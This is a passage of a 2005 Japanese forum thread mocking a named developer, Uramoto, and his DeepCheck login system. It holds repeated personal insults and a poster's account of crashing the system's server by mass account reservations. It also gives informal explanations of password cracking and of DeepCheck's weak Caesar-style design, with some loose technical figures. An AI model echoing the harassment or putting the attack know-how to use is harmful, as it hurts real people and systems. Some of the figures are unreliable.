>>828 したらアクセス制限されちゃうだろw
これでDeepCheckは安全ですね!
ハゲが起きている間はw
そのうち全部のポート閉じて、DeepCheckは誰にもクラックされませんでした!って言い出すに一票
>>755 破られてるのになんでウソつくの?
そこまで粘着的にウソをつき続けるのは何か違法なことをたくらんでる?
誰かがクラックに成功したらしたで、警察に届けられて、 「考えてみなよ。クラッキングOKだっていっても、実際にクラックされたら警察に届けないはずないだろ」 とか言われそでこわい...
ま、今までの浦本の発言見てりゃ、信用できない人間なのはわかりきってるしな
しかし、今日は浦本の書き込みが多かったなぁ。 そんなに必死になるなよ。 そんなに必死にならなくてもみんな分かってるからさ。
>>783 DoSは1番初歩的で1番有名なクラック手法だろ(笑)
浦本ってほんと何にも知らないのね。
なんでそんなに何も知らないの?
でさ、浦本がクラックOKってえ言ったときの浦本が想定してたクラックってどういうものなんだ(笑)
さー浦本ボキャブラリで会話する俺達は大変だぞ(笑)
>>784 おいおい、IP晒しちゃって酷い人間だね。
そういえば今までも何度もIP晒してたネェ。
浦本は自分がセキュリティに反することしてるのに気がついてないのね。(笑)
おまえの作ったもんなんか売れるかよ〜ダセー(笑)
>>786 >MLいやいやBBS、wiki さて、ご意見いただければ出来る事なら、そんな場を作りたく思っています。
浦本が作りたきゃ作ればいいけど、このスレッドでもまともに会話ができない浦本が新たに会話の場を作って何になるの?ねーねーおしえて(笑)
誰かが、サーバのクラックして暗号を破ったことになるのかみたいなこと 浦本さんに聞いてたけどさ、浦本さんは理解してなさそうだったしな。
>>830 uraアカウントの件がまさにそうだしな。(笑)
「浦本の母ちゃんの名前をあててみろ」ってのと同等なんだよな。浦本、この意味がわかるかな〜?
浦本は睡眠中です。そのまま8時間ほどお待ちください。
レデースエンドジェントルメン!! さーー本日の"マン オブ ザ ハジシラズ"の発表です。 ダダダダダダダダダダダダダダダダダダダダ♪ 見事"マン オブ ザ ハジシラズ"に輝いたのは…。 ダダダダダダダダダダダダダダダダダダダダ♪ ジャン!! 浦本勝久さんで〜す!おめでとー! それでは浦本さん…。あれ、。? あ、あ、浦本さん逃げないで、受賞ですよ!あ、まって、これは一般的セキュリティ知識の質問じゃありませんよ〜。 まってーいつもみたいに逃げる必要はないんですよぉ! 逃げないで〜尻尾巻いて逃げないでー。 ≡ ∧∧つ_ まて〜〜 ≡ ( ゚Д゚) | \/ づ|恥| (_-、ノ|男| ノノ∪ |賞| U ☆
ひさびさに歌をつくりました。どうでしょうか。 ヒャ〜〜〜〜〜〜アアアッ♪ ぼくのウラえもんが町をあるっけば みんな みんなが 振り返るぅよ! ハァ ウラウラ♪ ハァ ウラウラ♪ 風きるおつむはツンツルテンだよ ドタドタあんよはへんぺいそくだよ〜〜♪ ハア ヤッコラ ドッコイショのショ♪ だけど ウラえもん いいおとこぉ〜 こまったときの ウラだのみ たのんだよ まかせたよ ハア ヤッショ マカショ♪ ホイきたサッサの ウラえもん〜〜〜〜んんん〜♪
今日は、また、リクルートで忙しい。 中高年採用は増えてるけど、私は、別らしい。 あれなくせに、条件が多すぎるってやつかな? それとも、この板のこともあり、関わりを持ちたくないって事かな? ---
844 :
名無しさん@お腹いっぱい。 :2005/12/08(木) 08:02:24
>>842 >記憶による認証は生体認証に勝る。
「記憶しておいたID/Passの入力」という認証が生体認証にシフトしつつある現状を踏まえて証明せよ
仮説だと言い張るなら仮説が成立する条件を提示しろ。
かつそれが状況として一般的であると証明しろ。
コイツまだ仕事が見つからないの? どこまで無能なハゲなんだwwww
846 :
名無しさん@お腹いっぱい。 :2005/12/08(木) 10:36:55
>>845 中高年採用てのは要するにノウハウを持っている人を即戦力で使いたいってことだ。
浦本が採用されないのは
・ノウハウを持っていない
・戦力にならない
たぶん両方だろうね。
だから「条件が多すぎる」んじゃなくて、浦本が基本的な条件を満たしていないんだ。
ただそれだけのことだよ。役立たずは要らないと言われているだけだ。
浦本の場合は「勤勉な無能」だね。無駄なことばかり必死に続けている。
「将校には4つのタイプがある。第1に怠惰で無能なタイプ。これは放っておいても害にならない。
第2に勤勉で有能なタイプ。このタイプはどんな細かい事でもきちんと分析する有能な参謀になる。
第3に勤勉で無能なタイプ。このタイプが一番始末に負えないので、即座に除隊を命じなければならない。
第4に有能で怠惰なタイプ。このタイプを最高の位につけるのがいい」
(エーリッヒ・フォン・マンシュタイン元帥(独))
>第3に勤勉で無能なタイプ。 ハゲはこれですね。 ハローワークの中の人は人を見る目があるなぁw
848 :
名無しさん@お腹いっぱい。 :2005/12/08(木) 13:46:13
浦本さん、BoF にこれば、自慢の ディープチェク を披露するチャンスだったのに…
850 :
838 :2005/12/09(金) 00:07:22
アカウント予約をたくさん入れてみた俺がきましたよ。 ブルートフォース攻撃をしているわけではないのであしからず。 全部のアカウントを予約したら システムが実質的に機能しなくなって DeepCheckのシステム自体が脆弱だということの証明になる (そもそも認証まで行き着かないシステムはクソ) かなあと思ったのですが まさか2桁のアカウント予約だけで サーバーが落ちるとは思いもよりませんでした。 サーバーの貧弱さを証明しただけでしたね。 このままでは中身以前の問題として 認証システムとしては使えないと思いますよ。 もし、DeepCheckが実際に導入された際には システム全体としてどのような構成になるのでしょう。 とりあえずはこのへんで。
>>843 >今日は、また、リクルートで忙しい。
>中高年採用は増えてるけど、私は、別らしい。
>あれなくせに、条件が多すぎるってやつかな?
後学のためにお聞きしますが、どういう条件を出してるデスか?
お給料ですか、それとも残業ナシとかですか?
>それとも、この板のこともあり、関わりを持ちたくないって事かな?
この板のせいにするなっ!
まったく失礼しちゃうなぁ。
被害妄想が禿しすぎるよ、浦本さん!
どうした、全然盛り上がってない。 ウラモティの股間のように盛り上がっていきましょー。
>>845 さん、ご心配かけます。
まだなんです。よほど無能なのでしょう。
>>846 さん 悪態をつくのがよほど好きなのか、2ch 流で盛り上げようと現場って暮れてるのか、
私には分からない。
>>848 さん、これぞウィットかウエットの極地。俺なんか、ココアをぶちまけた事もあるな〜。
ご愁傷さま。
>>849 さん、そうですね、やはり集まってヤンヤカやるのは、それなりのオモシロサがありますものね。
本当はコソット行きたいのですよ。でも、何でも明け透けにいって逆に信用されない私ですが、なんか、照れてしまう
所もあって。(重度の自意識過剰)
>>851 さん、ありがとう。
メモリだけでの対応で手抜きしていたので、事前テストをやったんですが、まさか、実際やる人がいようとは!
DeepCheck+ではバーチャルメモリ化しております。HD空きの続く限り永遠に。
また、言葉尻ですがサーバーホストが落ちた訳ではありません。また、自動復帰もしていますね。(蛇足)
色眼鏡無しに体験頂いてるようで感謝いたします。
>もし、DeepCheckが実際に導入された際には
>システム全体としてどのような構成になるのでしょう。
これなんか、まさにドキュメントから欠落した部分です。
数行の言葉でさらっと流しすぎました。
今度はしつこいくらいに例示しようと計画しています。
また、ご不満の点など、ご教授いただければ幸いです。
>>852 さん 涙が出るくらいの気分です。
20年以上会社やってると、ぼろい会社でも結構なお客様、ごひいきいただいてる企業様がある訳です。
この方々をほっぽる事などできゃしません。
勢い、社員としての応募が出来ません。最低でもアルバイトを許す会社で無ければなりません。
また、私自身総でしたが、年上のスタッフとの仕事は疲れます。年齢制限が以前より圧倒的にゆるくはなっていますが、
中間管理職さんが、部下の事を慮って(余計なお世話)反対される様です。
ご時勢は、プログラムできれば稼げた時代は終わってるというのに、不勉強な管理職は多いのです。
くどいですが、もう一個。最近気づいたのですが結構我がままなのですね。正論を言う訳です。初対面の相手に。アホでしょ(*^_^*)
言わなきゃいいのに、あとでバレるのが怖い。けっこう小心者なのです。
857 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 08:31:21
>>854 >生体認証は詐称しやすい
証明がないね。浦本の妄想だな。
お役所は実績ベースで行動する。「前例」ってやつだ。
>>855 >また、ご不満の点など、ご教授いただければ幸いです。
お前、何か人を満足させられたことがあるのか?
858 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 08:32:50
>>856 お前が正論を吐いたことはないだろうが。
全て妄想や詭弁、ウソ。お前のここでのレスが証明している。
見破られてるんだよ。お前がクソだってことが。
>>853 さん
そういえば、最近、標高差0メートルが続いていまして。
困ったもんです。
>>857 さん
実態は仰る通りですね、>お役所は実績ベースで行動する。「前例」ってやつだ。
セキュリティに関しては、実績無しですから。
実績のある所が偉いと思うのは、こんな実績の無い会社の発表を丹念にサーベイされる事。
グーグル、インクトミサーチ、msn さんほどではないですが、日に一度はご来訪頂いています。
脇が固いんですね。
また、総会屋さんが出てきたので、今は、これくらいで。 今日はDeepCheck+関連に集中しようと思ってはいます。 では。
862 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 08:51:52
>>860 >セキュリティに関しては、実績無しですから。
で、生体認証がパスワード認証より弱いってはやく証明してよ
863 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 08:52:15
>>861 総会屋って誰の事かな?ん?
あんまり人を誹謗中傷するんじゃないよ?
864 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 08:59:21
さて、自分が言い出したことも証明できない浦本が責任転嫁して逃げ出したので 指紋認証を例にとって生体認証を解説しようか。浦本には理解できないだろうから ここを見ているみんなに向かって。もう知ってるよ、って人も多いだろうけど。 浦本踊りを見ているだけじゃ単なるその場の笑いだけなんで、ときどきはみんなの 役にたつことを書こう。浦本にはできないことだ。 指紋読取装置(指を置いてスキャンするもの)を用いた例と、一般的な アカウントを用いた例を使って、どちらが「安全」か、なぜ「安全」といえるのか 解説してみよう。 のんびり書いていくんで、ゆっくり待っててね。
865 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 09:11:21
まずはパスワードだ。既存のよくある方式だね。 この方法も時代を遡ると非常に脆弱だった。 /etc/passwd に ID と PASS のハッシュが載っていたときは、/etc/passwd さえ 得られればブルートフォースアタック(浦本は嫌がらせだと言っていたけどね) でパスワードを解析できた。 それじゃマズイってことで、shadow化が行われた。/etc/passwd にパスワードの ハッシュが書かれなくなり、読み取り制限のある /etc/shadow にハッシュが 記載されるようになった。Windows の場合、sam_ にハッシュが格納されている けど、これは最初から読み取り制限がかかっている。時期的に shadow の影響を 受けたものだろうね。 さらに認証情報の取扱も変化する。Telnet や POP3、FTP などではパスワード がクリアテキストとしてインターネット上を流れていた。やっぱりこれも問題だ、 盗聴に弱いよ、ってことで、今では FTP も使われなくなってきた。 Telnet は SSH に、FTP は sftp や scp に、POP3 は APOP に、といったように、 アカウント情報の保護ができるものに移行していった。 今は確かにスパイウェアに弱い、といえる。 かつてのパスワードクラックのポイントから今までの流れを見てみよう。 最初はサーバ上で /etc/passwd をもとにパスワードを入手できた。 それが防がれると、ネットワーク上でパスワードを盗聴した。 さらにそれも防がれて、今ではスパイウェアでクライアント上での入力をフック。 ここまではいいかな?
次をどうぞ
867 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 09:41:42
仕事しながら&書きながらなんで、ゆっくりになってます。ごめんよ('A`) 間違いがあったらいつでも突っ込んでくれい では、生体認証はどんなものか。指紋認証の基本形でいこう。 指紋認証の場合、指紋を画像として取り込む。スキャナ方式であってもいいし、 デジカメみたいな方法でもいい。指紋をしっかり解析できる程度の解像度が 得られていれば使えるだろうね。 実際の実装にはいろいろあるけど、一般的なものは「指紋の特徴ポイントを 複数確認する」って方法だ。 指紋全体をたとえばそうだなあ、30万画素くらいの画質で取り込むとする。 一辺が約550ピクセルのものだ。有効範囲を一辺500ピクセルとしよう。 このうち、8*8ピクセルの領域を12箇所ピックアップしてビットデータに変換 したものを「生体認証情報」としよう。64*12 で、768 Bit の情報だ。 ピックアップする位置はデバイスのインストール時に決定する、とする。 さて、指紋認証は警察の捜査で指紋の照合を行うのとおなじようなものだ。 警察でも12箇所の特徴の一致、ということをしているらしい。 ここで「生体認証が劣る」と言っちゃう浦本は科学捜査を否定していることに なっちゃって、とても現代人とは思えないね。 超能力捜査官のほうが信用できると言っちゃうようなものだ。 閑話休題。 12箇所の特徴が一致する別人の指紋が洗われる可能性は、 1.5525180923007089351489794884625e+231 分の 1 だった。(768桁の二進数) 155の下にゼロが229個つくくらいの人数をあつめて一人かな。 指紋認証は個人を識別するのに適しているといえるね。
>>867 >実装にはいろいろあるけど、一般的なものは「指紋の特徴ポイントを複数確認する」って方法だ。
一つ質問があるます。
本物の指と、単に指紋を写真に取ったものと、区別はどうするんですか?
869 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 09:59:19
>>868 昔はその問題に弱かった。写真やコピー、そうだな、グミ指なんてのもあった。
人形の指に指紋パターンを複写したもので認証が通っちゃったりね。
今では「生体である」ことを確認する仕組みが併用されている。
たとえば、体温と血流の確認。「手のひら認証」ってのは、静脈の形だけでなく、
血流の有無まで見ている。赤外線撮影すれば体温もわかるよね。
だから、極端に言えば「殺して切り取った手」では認証を突破できなくなっている。
もちろん、そこまで精巧なダミーをつくれば突破できなくなはい。
でも、そんなの作るにはコストがかかる。
メリット(リターン)に対してコストがかかりすぎると、それだけで抑止力になるんだ。
ただ、そういったデバイスはやっぱ高いんで、そこまで重要でない認証の場合は
もっと安いものをつかう。その場合は突破されちゃうかもしれないんで、パスワード
を併用することで多重認証の方式にして安全性を確保しているというワケ。
870 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 10:01:53
さて、生体認証と既存の認証のはなしの続き。
ここでそれぞれの強度を比較してみよう。
一般的なアカウント認証の場合、仮にID/PASS共に8桁とすると、1文字8bitで
16文字なんで、128bit の長さの認証情報を持っている、と言う事ができる。
(実際にはIDは公開情報に近く、またキーボードから入力できない文字が
あるので、強度は128bitをフルに使ったものに比べて劣る。
>>337 参照)
対して生体認証では、指紋認証の例でその6倍に達する768bitあることが、
>>867 の内容から読み取れるね。しかもビットパターンがそのままなんで、
入力できない文字の文字コード相当のパターンが使えない、なんてことはない。
この時点で、生体認証(指紋認証)のほうが認証の強度が高いということが
わかるよね。
同じ一方向ハッシュのアルゴリズムなら、情報量の大きなものが強い。
パスワードは充分な長さを、っていうのと同じだけど、指紋認証の場合では
本人だけが入力できる96文字のアカウントになる。88文字のパスワードが、
自動的に入力されるということだ。しかも機械的に処理されるから、間違い
や「メモをなくす」こともない。
本人もその96桁の文字の組み合わせを知らないからメモも取れない。だから
「教えろ」と言われても教えられない。
生体認証というのは、768bit長のキーを使うハードウェアトークンを人体で
代用した技術、と言い換えることもできる。
871 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 10:23:52
もちろん生体認証にも弱点がないわけじゃあない。
生体認証の場合、入力(指紋や虹彩、声紋、最近では顔の認証もある)を
いちど認証デバイスで電気信号に変換している。
つまり、偽の認証デバイスに差し替えて情報を奪えば、詐称も不可能ではない。
でもこれはさっき
>>868 の人の質問に
>>869 で答えたもので書いちゃったけど、
デバイスの差し替えを行うためにはコストっていうか、リスクが高すぎるんだ。
だって、ハードウェアに直接接触する必要があるんだからね。
キーロガーでキーボードとPC本体の間に設置するものがあるけど、あれと同じ
くらいのリスクがあるってことだ。
設備に侵入して設置するんだったら、そもそもハードウェアを盗み出したほうが
簡単ですぐ現金化できる。情報そのものを求めるなら、認証後の通信をトラップ
したほうが効率がいい。その場合はフィッシングのテクニックが使えることに
なる。つまり、認証としては充分な強度、堅牢性が維持できる、ということになる。
弱点はあるけど、攻略は充分に難しい、ってことだ。
対して一般の認証では、キーロガーに弱い。プログラムとしてインスコできる
から、たとえばウイルスやスパイウェアの機能としてインスコできちゃう。
こちらはコストが充分に低く、実際にウイルスやスパイウェアは蔓延している
ことからわかるように、攻撃方法としては一般化している。
生体認証でも電子情報をPC上で盗めそうだけど、実は認証デバイスをコントロール
しているのはデバイスドライバだ。スパイウェアがそれを乗っ取るには、まず
システム権限を奪い、さらにデバイスの詳細を得て、かつ、適切なドライバを
詐称しなければならない。やっぱりコストがかかりすぎるんだ。
872 :
851 :2005/12/09(金) 10:26:28
>>855 メモリフルでDeepCheckシステムが正常に動作しなくなるんですよね?
その時点で脆弱
(どこかで大々的に紹介されてアカウントの予約アクセスが集中した時点で
DeepCheckはシステムとして死亡する)
だと思うのですがいかがお考えでしょう。
uramotyさんのご見解をお聞かせください。
>また、言葉尻ですがサーバーホストが落ちた訳ではありません。また、自動復帰もしていますね。(蛇足)
>>777 >とりあえず、DeepCheckをリブートさせ、状況を確認してみます。
って手動復帰じゃないですか。。
あと、自身の想定していない範囲の攻撃をされたからといって
(まあ正常なリクエストなので攻撃だとは思っていなかったのですが)
IPアドレスを晒すのはご勘弁いただけませんか。
それと、DeepCheckサイトが許可しない攻撃を列挙していただけると助かります。
いろいろ他に試してみたいことがありますので。
873 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 10:40:48
認証方法の比較、最終回。と思ったら改行多すぎなんで二回に分けるよ。 さらに「記憶をもとにした認証」には生体認証にない弱点がある。 それは厳密には個人の認証ではない、ということだ。 記憶ベース、つまり「このパスワードを知っている人」という認証では、認証 情報を正しく入力できさえすればなりすましが可能となる。 ハードウェアトークンでは「デバイスの所有者」とという認証になる。これは デバイスが盗まれてしまうと非常にマズいことになる。 対して生体認証では、認証に使う入力がその人固有の情報だ。 指紋が同一である人が同時に複数いる可能性はゼロと考えて問題無い。 虹彩(ひとみ)や手のひら(静脈)も同様だ。 しかも盗む事が難しい。もちろんコピーも難しい事になる。 これを併用したのが、一部国際空港で利用されている「顔認証」だ。 顔認証では、虹彩(ひとみ)と顔の骨格の特徴をもとに本人認証している。 さらにパスポートも確認するんで、かなり厳密な本人認証になる。 要するに、重要な認証の場面ではより信頼性や堅牢性の高いものが求められ、 それに答えられたのが生体認証だ、ということだ。
874 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 10:41:09
これで一応は最後だよ。 記憶ベースではさらに、忘却による認証不能、メモなどから第三者への漏洩。 ハードウェアトークンの場合でも売却や貸与による第三者のログインといった 第三者ログインの可能性が否定できない。 でも、生体認証では、事実上認証情報を入力できるのが各個人だけに限られる。 第三者がなりすますことはきわめて難しい、と言えるね。 総合的にまとめると、 生体認証は「記憶ベース」の既存の認証より ・なりすましに強い ・認証として堅牢 である、と言う事ができる。 さて、浦本はこれを覆して生体認証が「記憶ベース」に劣ると証明できるかな?
875 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 10:49:43
>>851 さんが試したことは、俺が
>>328 で指摘したことだね。
ところが
>>328 で指摘した「アカウントが新設できなくなる」問題が顕在化する前に
システムがオーバーフローしてしまった、というわけだ。
いやあ、確かにアカウントが予約で一杯にならないよね(笑
その前にシステムが死んじゃうんだから(笑
たいしたセキュリティですこと(笑
で、認証システムが軽くDoSで死んじゃうって聞いたことないんだけど。
ってか、その程度でメモリ一杯にしちゃう認証システムなんか危なくて組み込めませんね。
いやあ、DeepCheckが売り物にならない理由がまたひとつ明らかになりましたな(笑
876 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 11:09:37
877 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 11:10:10
878 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 11:12:01
879 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 11:12:36
880 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 11:18:17
いかがでしたでしょうか。 浦本がタコ踊りをしているのを楽しむだけでなく、たまには浦本にできない 「役に立つ文章」を投下してみたくなったわけですが、お役に立ちましたでしょうか。 これらの文章は認証に関する基礎知識として、また浦本の馬鹿さ加減を楽しむ際の 基本情報としてご利用いただけるかと思います。 まもなく次スレの季節がやってきます。ふつうの方にとって年の瀬の忙しい時期ですが、 まだまだ浦本はヒマを持て余しているようです。これからもタコ踊りをお楽しみください。
事実上認証情報を入力できるのが各個人だけに限られる、 という生体認証の大きな利点は理解できました。 逆に認証情報(指紋とか)を生涯変更することができない、 つまり一度漏れたら二度と使えないというデメリットもあるのではないですか?
お前ら優しすぎwww しかしこんだけ無茶苦茶やって相手してもらえる浦本って幸せだな 俺も全力で釣られてる訳だがwww
883 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 13:07:55
>>881 いいところに気づきました。
>つまり一度漏れたら二度と使えないというデメリットもあるのではないですか?
まさにこれが生体認証の致命的な問題。交換ができないことがメリットであると同時に
最アックのデメリットともなりうるわけです。さらに言えば、「右手人差し指」で認証して
いたとき、事故でこれを失ったらどうするか?といったこともある。
万が一の際に回復困難なんだよね。
そこで、現在ではパスワード認証との併用が行われているケースが多い。
顔認証みたいに、虹彩と骨格などの複数の生体認証を組み合わせて、認証の信頼性を
維持するとともにバックアップ(厳密さをゆるめて認証できるような余裕を持たせる)が
できるようにしていたりします。また、指紋だけでも、複数の指を登録したり、認証先の
システムによってピックアップする特徴ポイントが違うようになっていれば、仮に漏洩しても
全てに認証されてしまう事態を避けることができる、というわけです。
ただ、サーバから漏れた等の場合ではサーバ側のセキュリティの問題で、認証システム
そのものの問題ではない事、スニフして電子化したデータを取り出すことは既存の
暗号通信で充分防げる事、先に書いたようにデバイスのタップはコストがかかりすぎる
ことなどから、生体認証の機構からの漏洩はかなり難しいということはできます。
884 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 13:17:38
どこかの銀行で手のひら認証をATMに組み込んでいたところがありますが、 あれも手のひらだけで認証しているのではなく、キャッシュカードと暗証番号 による既存の認証に加えて本人確認をしている、といったことです。 相互補完でより堅牢な個人認証を実現している、というわけですね。 なので、浦本が提唱した「生体認証は記憶ベースの認証に劣る」は間違いで、 基本的に生体認証はより厳密な個人認証ができるが、認証できなくなった 場合(事故や怪我、病気で指紋や目を失ったり顔の形が変わったり)に備えて 既存の認証(そこまで厳密ではない)を併用することで汎用性を維持している、 といった状況が生まれているわけです。 生体認証は「有能だけど堅物で融通がきかない偉い人」みたいな感じ。 だから、これまでの「受付のオバチャン」的アカウント認証でカバーできるよ、 といったところですか。 浦本式は目が悪く耳も遠いお年よりをガードマンにするみたいなものです。 「○○課の○○ですけどぉ!!」「はぁ?どちらさんですかな?」みたいな。
>>884 チンコチェックの肝はなんでしょう?
実装の糞さはおいておいて、なにか新しいアイデアが爪の垢ほどでもあると思われますか?
実はハゲのサイトには一度も言ったことがない。
886 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 13:53:21
>>885 前に10レスゲームのときに「利点を挙げろ」と迫りましたが、ついに浦本は一つも挙げられず。
製作者がキモになる利点を挙げられないというのに、私になにが言えましょうか・・・
UI は「五個の文字うち実際には一つを入力している」というもの。これで浦本はスパイウェア
対策になっていると思い違いをしているようですが、単にトライ回数が五倍になるだけでしか
ありません。この点については10レスゲームのあとで見つけてしまっています。
なので、これはキモではないでしょう。
となると、「毎回ユーザにパスワード変更を強要する」といったものでしょうか。いいえ、それは
従来の認証で「ログイン回数」をキーにパスワードの有効期限を切ればいいだけです。
Windowsでさえ、ユーザのプロパティに「ユーザーは次回ログオン時にパスワードの変更が必要」
というチェックができるのです。これを自動化するだけで済んでしまいます・・・・・
従来のパスワードでは解析にかかる時間の期待値を下回る期間で変更すればOKでした。
それ以上は必要ないのです・・・・これもキモではありません。
スニフィング対策はSSL等の暗号通信で確保できます。シーザー暗号がまさかスニフ対策で
あるはずがありません・・・・これでもない。
わかりません。なにかキモになる、新しいアイディアや問題を解決する提案があるのでしょうか。
887 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 14:11:48
DeepCheck がキモい、というのであれば激しく同意なんですが('A`)
>>886 dクスです。チンコチェックは原理的にはなんら見所はないということですね。
敢えて心を鬼にして利点をあげると「五個の文字うち実際には一つを入力している」という
UI部分になりますか。入力が簡単であると。
この一つの入力がハゲがよく言うところのカーソル位置ということでしょうか?
ハゲが言うに、チンコチェックはワンタイムパスワード方式らしいんですが、
1回目の認証時にチンポッポのッにカーソルがあったとして、2回目はどんな感じになるんでしょうか?
889 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 14:46:03
>>888 「五個のうち実際には一つ」というのは、要するに同時に5文字が表示されていて、たとえば
1列目:ち
2列目:ん
3列目:ぽ
4列目:っ
5列目:ぽ
が指定されたとき、それらのうち(ユーザが以前に指定しておいた)x行目が入力されている、というもの。
なので、UI がどうとかではなく、単に「五回入れたパスのうち正解は一つ」レベルなのです。
しかもフルマウスオペレーションでスライド式に文字を選択させると五列同時にスクロールするので
重くて使いづらくてどうしようもありませんでした。クソUIです。
ワンタイムパスワードは、浦本が言い張っているだけで実際には違います(
>>463 >>467 )
カーソル行の変更は単に「何列目が正解か」を変えているだけですので、強度に影響はありません。
パスワードの強制変更でしたら、「新規パスワードの確認入力」もないので、1文字ミスるとアウトです。
クソUIのなせる技ですけどね。
890 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 14:57:15
チンコチェックのUIでなんとかしようとしているレベルの「スパイウェア対策」は、要するにこういうこと。
ID [__________]
PASS1 [__________]
PASS2 [__________]
PASS3 [__________]
PASS4 [__________]
PASS5 [__________]
こんな感じでパスワードを五個入れさせる。で、実際に認証に使うのはあらかじめ選択した
何番目かのパスワード欄の値。これでチンコチェックレベルの対策はできてしまっている。
なぜなら、
>>358 >>366 で書いたように「パスの何桁目はこの五文字のうちいずれか」程度、
つまり既存では「パスの何桁目はこの文字」が五回のトライで破られる程度になっただけで
要するに入力が「五文字同時」か「連続入力」かの違いしかない。
しかもこの方式のほうがまだマシな操作性だから、本ッッ当にあのUIがクソだってのがわかる。
891 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 15:02:36
それだけじゃないな。
>>890 の UI なら、既存の画面の書き換えと
「何番目のパスが正解か」を取り出すロジックを噛ませるだけだから、
DeepCheckなんかよりはるかに軽いし、操作性もいいし、さらに言えば
ロジック部分がものすごく基礎的なコードになるから移植も楽、つまり
PerlだろうがPHPだろうがなんだろうがちょっとしたラッパを書くだけで
済んでしまうし、組み込みも楽だ。だからセッション管理等で問題が
おきる可能性もとてもとても低い。
しかもDeepCheckみたいにパスワード文字種を制限してしまってISMSに
通らなくなるとか、そういう問題はアッサリ回避できてしまう。
浦本が問題を増やしてばかりでなにも解決できていない証拠だね。
ちなみに
>>890 の UI は「チンコ互換」なだけで、認証としては既存の
ものから何ら改善されておらず、面倒になっただけだということは
間違いない。要するにチンコチェックは発想からクソってわけ。
>>889 もう少しお付き合いください。
横方向に列を、縦方向に行を数えることにして書き直しますよ。
パスワードは「ちんぽっぽ」、ユーザが以前に指定しておいたのを3行目とすると、
1列目 2列目 3列目 4列目 5列目
1行目
2行目
3行目 ぽ 任意 任意 任意 任意
4行目
5行目
となっていて、マウスでスクロールすると
1列目 2列目 3列目 4列目 5列目
1行目
2行目 ん 任意 任意 任意 任意
3行目
4行目
5行目
となるんでしょうか?
893 :
892 :2005/12/09(金) 15:17:28
>>890 がわかりやすいですね。やっと理解できた気がします。
>パスワードを五個入れさせる。で、実際に認証に使うのはあらかじめ選択した何番目かのパスワード欄の値。
これがチンコチェックのベース部分ですか。
本物のパスワードの前後にそれ以外の文字列を足すだけですか。
こんなものに丸々1年間ですか。そうですか、そうですか。
895 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 15:42:00
>>894 もしこんなものを採用する企業があったら、社長の顔をみてみてーーw
896 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 15:44:28
>>894 まあだいたいそんなもんです。
たとえば、私のIDが「nanashi」で、パスワードが「2chuser」だとします。
ログイン時に、マウス操作で五列分を同時に入力します。ここで私のカーソル行が「2」とすると
>>890 の互換 UI では
ID:[nanashi]
PASS1:[doifrt]
PASS2:[2chuser]
PASS3:[9kolsa]
PASS4:[i1okfw]
PASS5:[imz0q]
みたいに入力したのと等価になります。さらにパスワードに続けて「次回パス」も入力させるので、
浦本の言い分では
・パスワードの長さがわからないのでクラックできない(実際には文字列が把握できるので問題ない)
・五つのカーソルのうちどれが正解かわからない(五回繰返せば済むのでたいしたものではない)
となります。
ちなみに実際のチンコでは
>>890 のようにならず、カーソルが固定のため文字間の差を出す
だけで済んでしまい、内部では五種類ではなく、一種類の文字列を五種類のシーザー暗号に
変換しているだけと言っても過言ではありません。
シーザー暗号のキーは二回のスニフィングで取れるため、一見して五回以上トライしないと
難しいように思えますが、実際には従来のものに比べて「もう一回スニフ」するだけ、という、
非常にお粗末な結果になっています。
一年かかってこれなんです。
>>894 ティンコチェック+だの#だの、次から次へとよく出てくるなと思っていたら
こんなチンケな子供騙しのただの変形だけだったわけですか。
これなら次から次へと新しい?wアイデアがでてくるのも頷けますなw
>>890 >さらにパスワードに続けて「次回パス」も入力させる
次回パスのカーソル行も「2」なんですね?
で、1回目と同様に5つの文字列(そのうち一つは次回パスワード)を入力するわけですか?
結局ティンコって、狭義のキーロガー対策だけを必死でやっただけ? 信じられないレベルの話だw
900 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 16:02:57
内部の大雑把な説明。
カーソル、というのは、実際には「何番目のパスが正解」ではなく、「何番目のキーが正しいシーザー暗号キー」
である、というだけでしかありません。
なので、パスが「2ch」次回パスが「user」の場合、0123456789abcdefghijklmnopqrstuvwxyz のマップから
「2chuser」を文字順で拾って(ゼロスタートなので)2,12,17,30,28,14,27 となります。(次回パスもつながってます)
ここで、カーソルはシーザー暗号キーを作ります。カーソルが初期に何文字目を指しているか、がキーです。
カーソルがそれぞれ、1,2,3,4,5 と指していた場合、カーソル番号「2」が正しいカーソルなら、認証リクエストは
カーソルキー=1,2,3,4,5
暗号文=4,14,19,32,30,16,29
となります。
カーソルキー「2」があたりなら、シーザー暗号のスライドで2文字戻せばよいので、暗号文の4は2番目の文字。
間違ったカーソルキーを使うと別の文字列が帰るので、正しいパスは得られない。その程度のものです。
また、復号した「2chuser」からは「どこまでが次回パスかわからない」と言いますが、文字数-1回だけトライすれば
必ずヒットするので、これも問題にはなりません。
>>890 で思い付きを示したものが、浦本が一年かかったチンコチェックを軽く上回ってしまったので心苦しい限りです。
まさか、私が五分で思いついたものが、浦本の一年を上回ってしまうとは思いませんでした。
901 :
名無しさん@お腹いっぱい。 :2005/12/09(金) 16:06:52
>>898 おおよそ、そのとおりです。
しかし、内部的には文字列ではなく「何番目」かを持っているだけで、さらにはシーザー暗号で
